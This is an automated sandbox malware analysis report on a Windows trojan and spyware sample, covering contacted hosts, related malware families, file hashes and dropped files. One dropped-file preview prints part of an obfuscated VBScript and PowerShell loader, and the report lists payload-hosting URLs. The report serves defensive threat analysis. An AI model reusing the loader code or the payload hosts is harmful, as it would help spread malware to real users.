                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000006.00000002.2009787604.000001169A162000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://cdn.cookielaw.org/powershell.exe, 00000006.00000002.2009787604.00000116963CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009787604.00000116961F8000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssueRegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2004/10/wsat/CompletionRegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2004/04/trustRegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://tempuri.org/Entity/Id10RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://tempuri.org/Entity/Id11RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://tempuri.org/Entity/Id12RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://tempuri.org/Entity/Id16ResponseRegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponseRegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/CancelRegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://tempuri.org/Entity/Id13RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://tempuri.org/Entity/Id14RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://bbuseruploads.s3.amazonaws.com/4be491a4-012e-46db-bc28-27fee082b0f0/downloads/f4d27c97-7447-powershell.exe, 00000006.00000002.2009787604.0000011699F8B000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://tempuri.org/Entity/Id15RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://tempuri.org/Entity/Id16RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2005/02/trust/NonceRegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://tempuri.org/Entity/Id17RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://tempuri.org/Entity/Id18RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://tempuri.org/Entity/Id5ResponseRegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://tempuri.org/Entity/Id19RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsRegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
IP               Domain                        Country        ASN    ASN Name            Malicious
52.216.210.153   s3-w.us-east-1.amazonaws.com  United States  16509  AMAZON-02 (US)      false
185.196.9.26     unknown                       Switzerland    42624  SIMPLECARRIER (CH)  true
185.199.109.133  raw.githubusercontent.com     Netherlands    54113  FASTLY (US)         true
185.166.143.49   bitbucket.org                 Germany        16509  AMAZON-02 (US)      true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1519351
Start date and time: 2024-09-26 12:15:10 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 57s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: sRMytgfRpJ.exe
renamed because original name is a hash value
Original Sample Name: 51c009abf871216f8d9e40cdd785ce6c.exe
Detection: MAL
Classification: mal100.spre.troj.spyw.expl.evad.winEXE@14/13@3/4
EGA Information:
• Successful, ratio: 33.3%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 170
• Number of non-executed functions: 29
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target RegAsm.exe, PID 8044 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7476 because it is empty
• Not all processes were analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                          • Report size getting too big, too many NtCreateKey calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          • VT rate limit hit for: sRMytgfRpJ.exe
Time      Type             Description
06:16:18  API Interceptor  47x Sleep call for process: powershell.exe modified
06:16:39  API Interceptor  11x Sleep call for process: RegAsm.exe modified
Match            Associated Sample Name / URL                                  Detection  Threat Name
52.216.210.153   https://tiktokshop.cash/wap                                   malicious  Unknown
185.196.9.26     HotYVOv1.exe                                                  malicious  RedLine
                 sloppyCatsV1.exe                                              malicious  RedLine
                 UltraViolince.exe                                             malicious  RedLine
                 GTA 5 Mod Menu.exe                                            malicious  RedLine
                 GTA 5 Mod Menu.exe                                            malicious  RedLine
                 UIExecutor.exe                                                malicious  RedLine
                 i0OvRpJuq7.exe                                                malicious  RedLine
                 IrisKevin533Rachel.lib.exe                                    malicious  RedLine
                 Loader.exe                                                    malicious  RedLine
                 d3d9x.dll                                                     malicious  RedLine
185.199.109.133  SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dll    malicious  Metasploit
                 • Context: raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt
                 SecuriteInfo.com.Win64.MalwareX-gen.11827.5130.dll            malicious  AsyncRAT, XWorm
                 • Context: raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt
185.166.143.49   https://sydlegal001.bitbucket.io/                             malicious  HTMLPhisher
                 2plugin27724.exe                                              malicious  Xmrig
                 UBONg7lmVR.exe                                                malicious  Unknown
                 https://github.com/massgravel/Microsoft-Activation-Scripts    malicious  Unknown
                 sostener.vbs                                                  malicious  Remcos
                 Crpted.vbs                                                    malicious  Unknown
                 sostener.vbs                                                  malicious  Remcos
                 remittances.exe                                               malicious  Remcos, GuLoader
                 ExeFile (71).exe                                              malicious  Unknown
                 xKCGmDmnB1.exe                                                malicious  LummaC
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
s3-w.us-east-1.amazonaws.com | http://tiktoksc.xyz/ | Get hash | malicious | Unknown | Browse | 52.216.56.153
| http://tiktok1688.cc/ | Get hash | malicious | Unknown | Browse | 54.231.229.145
| https://tkshopax1.cc/ | Get hash | malicious | Unknown | Browse | 16.15.176.192
| https://tiktok-shopsxx.top/ | Get hash | malicious | Unknown | Browse | 3.5.31.10
| envifa.vbs | Get hash | malicious | Unknown | Browse | 52.216.57.225
| https://tkclub1.com/ | Get hash | malicious | Unknown | Browse | 3.5.28.99
| http://wholesale-tiktok.shop/ | Get hash | malicious | Phisher | Browse | 3.5.25.85
| https://tkmallj.top/ | Get hash | malicious | Unknown | Browse | 52.216.153.20
| https://tiktokity.com/ | Get hash | malicious | Unknown | Browse | 54.231.163.193
| https://ddhhgvu.top/ | Get hash | malicious | Unknown | Browse | 52.217.204.113
raw.githubusercontent.com | http://frt.pkgu192.vip/ | Get hash | malicious | Unknown | Browse | 185.199.109.133
| https://gungnir-interface-test.pages.dev/ | Get hash | malicious | Unknown | Browse | 185.199.111.133
| https://fastsoluudapppmigratee.com/ | Get hash | malicious | Unknown | Browse | 185.199.111.133
| https://maveuve.github.io/frlpodf/marynewreleasefax.html | Get hash | malicious | Remcos | Browse | 185.199.111.133
| SecuriteInfo.com.Win64.Malware-gen.15701.20735.exe | Get hash | malicious | LummaC, Go Injector, LummaC Stealer, MicroClip | Browse | 185.199.109.133
| batman.ps1 | Get hash | malicious | Unknown | Browse | 185.199.110.133
| t1RVQb98yT.exe | Get hash | malicious | S400 RAT | Browse | 185.199.110.133
| 9Jvb8f4R5m.exe | Get hash | malicious | S400 RAT | Browse | 185.199.108.133
| https://aptos-web-git-chore-shows-the-staking-token-website.pancake.run/farms | Get hash | malicious | Unknown | Browse | 185.199.111.133
| https://aptos-web-git-aptos-pool.pancake.run/farms | Get hash | malicious | Unknown | Browse | 185.199.111.133
bitbucket.org | envifa.vbs | Get hash | malicious | Unknown | Browse | 185.166.143.48
| sostener.vbs | Get hash | malicious | Njrat | Browse | 185.166.143.50
| S0FTWARE.exe | Get hash | malicious | Go Injector, Vidar, Xmrig | Browse | 185.166.143.50
| SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe | Get hash | malicious | Amadey, Clipboard Hijacker, Cryptbot, Go Injector, LummaC Stealer, PrivateLoader, PureLog Stealer | Browse | 185.166.143.48
| SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe | Get hash | malicious | Amadey, Clipboard Hijacker, Cryptbot, Go Injector, LummaC Stealer, PrivateLoader, PureLog Stealer | Browse | 185.166.143.50
| file.exe | Get hash | malicious | LummaC, PureLog Stealer, RedLine, Socks5Systemz, Stealc, Vidar, Xmrig | Browse | 185.166.143.50
| https://www.getcoloringpages.com/coloring/359 | Get hash | malicious | Unknown | Browse | 185.166.143.48
| HelperLibrary.ps1 | Get hash | malicious | Unknown | Browse | 185.166.143.50
| SX8OLQP63C.exe | Get hash | malicious | VjW0rm, AsyncRAT, RATDispenser | Browse | 185.166.143.50
| Leer documentos confidenciales anexos por parte de la Corte Suprema De Justicia.vbs | Get hash | malicious | Unknown | Browse | 185.166.143.48
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
SIMPLECARRIERCH | zrOUNP9gMJ.exe | Get hash | malicious | AsyncRAT, VenomRAT | Browse | 185.196.10.235
| Or3dzp4vB1.exe | Get hash | malicious | XWorm | Browse | 185.196.10.235
| KAV3vJud90.exe | Get hash | malicious | DarkVision Rat | Browse | 185.196.10.235
| updater.exe | Get hash | malicious | RHADAMANTHYS | Browse | 185.196.11.237
| HotYVOv1.exe | Get hash | malicious | RedLine | Browse | 185.196.9.26
| VtkzI2DleKAWijQ.exe | Get hash | malicious | AgentTesla | Browse | 185.196.9.150
| sloppyCatsV1.exe | Get hash | malicious | RedLine | Browse | 185.196.9.26
| UltraViolince.exe | Get hash | malicious | RedLine | Browse | 185.196.9.26
| GTA 5 Mod Menu.exe | Get hash | malicious | RedLine | Browse | 185.196.9.26
| GTA 5 Mod Menu.exe | Get hash | malicious | RedLine | Browse | 185.196.9.26
FASTLYUS | g3V051umJf.html | Get hash | malicious | Unknown | Browse | 151.101.192.176
| https://t.co/gYSeG2q7l2 | Get hash | malicious | Unknown | Browse | 199.232.188.159
| HPDeskJet_043_SCAN.pdf | Get hash | malicious | Phisher | Browse | 151.101.2.137
| Contract_Agreement_Wednesday September 2024.pdf | Get hash | malicious | Unknown | Browse | 199.232.214.172
| http://frt.pkgu192.vip/ | Get hash | malicious | Unknown | Browse | 185.199.110.133
| https://sparebankno-privat.netlify.app/ | Get hash | malicious | Unknown | Browse | 151.101.2.137
| http://banlombiavirtusucursalyfgdsffg.vercel.app/ | Get hash | malicious | Unknown | Browse | 185.199.111.133
| https://docs-i-trezor.github.io/en-us/ | Get hash | malicious | HTMLPhisher | Browse | 151.101.129.229
| http://banlombiasucursalvirtughasd.vercel.app/ | Get hash | malicious | Unknown | Browse | 185.199.111.133
| http://cancelarcompravirtusucursajgbf-9mfi.vercel.app/ | Get hash | malicious | Unknown | Browse | 185.199.108.133
AMAZON-02US | g3V051umJf.html | Get hash | malicious | Unknown | Browse | 13.32.99.92
| https://cantanero.pro/ | Get hash | malicious | HTMLPhisher | Browse | 76.76.21.22
| https://pdftomuchmattersupdatings-vercel-app.translate.goog/?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp | Get hash | malicious | Unknown | Browse | 76.76.21.98
| eMoS6hG54p.exe | Get hash | malicious | FormBook | Browse | 13.248.252.114
| gvyO903Xmm.exe | Get hash | malicious | FormBook | Browse | 13.248.169.48
| CITA#U00c7#U00c3O.exe | Get hash | malicious | FormBook | Browse | 13.248.169.48
| ADNOC requesting RFQ.exe | Get hash | malicious | FormBook | Browse | 54.228.54.207
| http://tiktoksc.xyz/ | Get hash | malicious | Unknown | Browse | 54.231.203.153
| http://tiktok1688.cc/ | Get hash | malicious | Unknown | Browse | 52.219.128.16
| https://tkshopax1.cc/ | Get hash | malicious | Unknown | Browse | 54.231.229.193
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
3b5074b1b5d032e5620f69f9f700ff0e | nBank_Report.pif.exe | Get hash | malicious | Snake Keylogger | Browse | 52.216.210.153, 185.166.143.49, 185.199.109.133
| z1Invoice1.bat.exe | Get hash | malicious | VIP Keylogger | Browse | 52.216.210.153, 185.166.143.49, 185.199.109.133
| ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe | Get hash | malicious | Snake Keylogger | Browse | 52.216.210.153, 185.166.143.49, 185.199.109.133
| sostener.vbs | Get hash | malicious | AsyncRAT, DcRat | Browse | 52.216.210.153, 185.166.143.49, 185.199.109.133
| sostener.vbs | Get hash | malicious | Remcos, PureLog Stealer | Browse | 52.216.210.153, 185.166.143.49, 185.199.109.133
| sostener.vbs | Get hash | malicious | Remcos | Browse | 52.216.210.153, 185.166.143.49, 185.199.109.133
| asegurar.vbs | Get hash | malicious | Remcos, PureLog Stealer | Browse | 52.216.210.153, 185.166.143.49, 185.199.109.133
| SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 52.216.210.153, 185.166.143.49, 185.199.109.133
| CMR_7649.EXE.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 52.216.210.153, 185.166.143.49, 185.199.109.133
| RFQ____RM quotation_JPEG IMAGE.img.exe | Get hash | malicious | Snake Keylogger | Browse | 52.216.210.153, 185.166.143.49, 185.199.109.133
                                                                    No context
                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Wed Oct 4 11:02:37 2023, atime=Wed Sep 27 04:28:27 2023, length=3242272, window=hide
                                                                    Category:dropped
                                                                    Size (bytes):2104
                                                                    Entropy (8bit):3.456537717214464
                                                                    Encrypted:false
                                                                    SSDEEP:48:8Spd+cTeAT7RYrnvPdAKRkdAGdAKRFdAKR/U:8S6cSt
                                                                    MD5:87B650435276D97642F8B292884DEA7C
                                                                    SHA1:7FE32EE2A7772A4118FDFB23C0394693EFD3697C
                                                                    SHA-256:A219977F7817CD4E9E520A2EB52FA98BC08C241D781962207C2191EC600ED733
                                                                    SHA-512:D95CCC0BC0CC5DB2ED93FB7130096158D13DB464B9ACCDD7BB14CC372AFF2F40FA3226D8E868F9EBB4B516718D1413FB036829E4F01E590C6447377CA36B5739
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:L..................F.@.. ......,.............q.... y1.....................#....P.O. .:i.....+00.../C:\.....................1.....DW.V..PROGRA~1..t......O.IDW5`....B...............J.....i...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VDWS`....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VDWS`....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VDWS`..........................."&.A.p.p.l.i.c.a.t.i.o.n.....`.2. y1.;W.+ .chrome.exe..F......CW.VDWJ`..........................,.6.c.h.r.o.m.e...e.x.e.......d...............-.......c............F.......C:\Program Files\Google\Chrome\Application\chrome.exe....A.c.c.e.s.s. .t.h.e. .I.n.t.e.r.n.e.t.;.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.!.-.-.p.r.o.x.y.-.s.e.r.v.e.r
                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):3274
                                                                    Entropy (8bit):5.3318368586986695
                                                                    Encrypted:false
                                                                    SSDEEP:96:Pq5qHwCYqh3oPtI6eqzxP0aymRLKTqdqlq7qqjqcEZ5D:Pq5qHwCYqh3qtI6eqzxP0at9KTqdqlqY
                                                                    MD5:0B2E58EF6402AD69025B36C36D16B67F
                                                                    SHA1:5ECC642327EF5E6A54B7918A4BD7B46A512BF926
                                                                    SHA-256:4B0FB8EECEAD6C835CED9E06F47D9021C2BCDB196F2D60A96FEE09391752C2D7
                                                                    SHA-512:1464106CEC5E264F8CEA7B7FF03C887DA5192A976FBC9369FC60A480A7B9DB0ED1956EFCE6FFAD2E40A790BD51FD27BB037256964BC7B4B2DA6D4D5C6B267FA1
                                                                    Malicious:false
                                                                    Reputation:moderate, very likely benign file
                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):64
                                                                    Entropy (8bit):1.1940658735648508
                                                                    Encrypted:false
                                                                    SSDEEP:3:Nlllulf66llp:NllUSOl
                                                                    MD5:B798C92691636A7830BE142C313C0E72
                                                                    SHA1:53C2A97D145573705355A8C39757DB8009D116CC
                                                                    SHA-256:5D6C0E321D148D9CD398B4261686BA6344F9FFF6FB4226AF1C8AEE4FB89DC75F
                                                                    SHA-512:6198106131F8C8083DA7946BADE71A6BB3A37474DC81E699976680CD3ACC1E84B8A151F7F8D15A79C1343BB108992D44CB98FE78593F55CE891B669EB6022106
                                                                    Malicious:false
                                                                    Reputation:moderate, very likely benign file
                                                                    Preview:@...e................................................@..........
                                                                    Process:C:\Users\user\Desktop\sRMytgfRpJ.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):17422
                                                                    Entropy (8bit):5.438010053566963
                                                                    Encrypted:false
                                                                    SSDEEP:384:0Ud4S9hu91w5j4fe0zmVFaMGVOBZnKSVPJmxNSiMFpWY:0E/LewWXzmVFaFVqZK+W2T
                                                                    MD5:85984861EFF636EB9F333FA3FA2D51AE
                                                                    SHA1:F6FA4C8AC4D0BC005530D01293FA5B6C7C28EC50
                                                                    SHA-256:E5BC3BDE1C727E31CBE1C230A015E3CB2585D005E638BC4ED8AB6628000FE19D
                                                                    SHA-512:297BF23612E3231F680C1676F6A33F64618428A38389B0AEF1BE9126EE48BCE50C225A69707149FF850F59173532CD1B5994113B0A971AAEAEE06A2CEFA1A06E
                                                                    Malicious:true
                                                                    Preview: 'g..aoamjrckfSi = rRegisggfgtertehkggns2211 & ""..Call Uglisging("")..Call Uglisging("")..Call Uglisging("$co" & "digo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#G")..Call Uglisging("k#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d")..rfgfomIfI = LenB("dAbdicbdF")..Const SkSghpa = "kmmSSdhj"..'ncekdcFIg mmiopcc..hdgghIj = LenB("Fkfckggd")..Const SpkgfFi = "iIcAkdmf"..'jmIjpema bdrhana..emarmIAhm = LenB("eAjnejbo")..Const jkmgFmko = "mpoknoi"..'dIFjkbkkk mAekISdp..IcFnrIhki = LenB("chdhFgoo")..Call Uglisging("#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy")..Const odhajnr = "SiISkSdnd"..'SrkrdcS oIhAhhdp..pocedmp = LenB("hndohShS")..Const igdhidmFI = "mdIgcojkf"..'dibFpihi iFnfIafIA..pnSIkdk = LenB("hkiIhfAIA")..Const cmSAmkjaa = "IAimrdnnd"..'SFkkknin AaoadSI..hkdfmkS = LenB("cSIkFhmS")..Const oedcSmfk = "dknArjj"..Call Uglisging("#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N")..Call Uglisging("##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#b
                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):2662
                                                                    Entropy (8bit):7.8230547059446645
                                                                    Encrypted:false
                                                                    SSDEEP:48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
                                                                    MD5:1420D30F964EAC2C85B2CCFE968EEBCE
                                                                    SHA1:BDF9A6876578A3E38079C4F8CF5D6C79687AD750
                                                                    SHA-256:F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
                                                                    SHA-512:6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
                                                                    Malicious:false
                                                                    Preview:0..b...0.."..*.H..............0...0.....*.H..............0...0.....*.H............0...0...*.H.......0...p.,|.(.............mW.....$|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%..*.X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...|B.d..kr.=G.g.v..f.d.C.?..*.0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):2251
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3::
                                                                    MD5:0158FE9CEAD91D1B027B795984737614
                                                                    SHA1:B41A11F909A7BDF1115088790A5680AC4E23031B
                                                                    SHA-256:513257326E783A862909A2A0F0941D6FF899C403E104FBD1DBC10443C41D9F9A
                                                                    SHA-512:C48A55CC7A92CEFCEFE5FB2382CCD8EF651FC8E0885E88A256CD2F5D83B824B7D910F755180B29ECCB54D9361D6AF82F9CC741BD7E6752122949B657DA973676
                                                                    Malicious:false
                                                                    File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                    Entropy (8bit):6.869975424944922
                                                                    TrID:
                                                                    • Win64 Executable GUI (202006/5) 92.65%
                                                                    • Win64 Executable (generic) (12005/4) 5.51%
                                                                    • Generic Win/DOS Executable (2004/3) 0.92%
                                                                    • DOS Executable Generic (2002/1) 0.92%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:sRMytgfRpJ.exe
                                                                    File size:165'376 bytes
                                                                    MD5:51c009abf871216f8d9e40cdd785ce6c
                                                                    SHA1:54bb04f21150f5706a3171847d3de9851cafcccf
                                                                    SHA256:9754bc10564077425803459cc91b0197ad96263e6994e9afc2a5fd0e932615d8
                                                                    SHA512:9df0d599f2dd954e235cb7949b85f3035dfcd7ac8920c5fe14797f29c8d5d6d8d1b0a70e02f10db93255c5200ab9b7c5ed6fca86783d507d883b7be6485c3797
                                                                    SSDEEP:3072:xahKyd2n31q5GWp1icKAArDZz4N9GhbkrNEk11/cWQKCT:xahO6p0yN90QEoBS
                                                                    TLSH:BEF38D1A63F420A6E4BA577498F202939A32BCB15B7586FF12C4D57E0E336C0A532F17
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D..e...6...6...6...7...6...7...6...7...6...7...6...6...6...7...6..o6...6...7...6Rich...6................PE..d................."
                                                                    Icon Hash:3b6120282c4c5a1f
                                                                    Entrypoint:0x140008200
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x140000000
